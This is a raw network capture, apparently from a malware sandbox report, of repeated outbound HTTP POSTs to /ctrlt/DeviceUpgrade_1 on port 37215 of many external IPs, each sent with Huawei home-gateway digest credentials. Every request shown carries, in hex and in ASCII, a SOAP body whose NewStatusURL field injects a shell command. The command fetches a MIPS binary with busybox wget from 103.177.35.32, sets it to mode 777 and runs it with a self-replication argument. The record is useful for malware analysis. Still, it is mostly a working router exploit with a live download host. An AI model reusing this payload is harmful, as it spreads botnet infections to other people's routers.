                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2222192.168.2.234952641.205.249.13337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.576131105 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2223192.168.2.2333928189.84.59.22137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.576139927 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2224192.168.2.2340100197.116.131.9637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.576141119 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2225192.168.2.2360234197.246.214.13337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.576144934 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2226192.168.2.2336612157.129.32.19037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.576154947 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2227192.168.2.234896641.201.157.10237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.576160908 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2228192.168.2.2337092197.129.15.19037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.576253891 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2229192.168.2.233614841.145.140.6337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.576359987 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2230192.168.2.2332996197.232.78.6437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.576364994 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2231192.168.2.2355850116.114.123.14937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.576380014 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
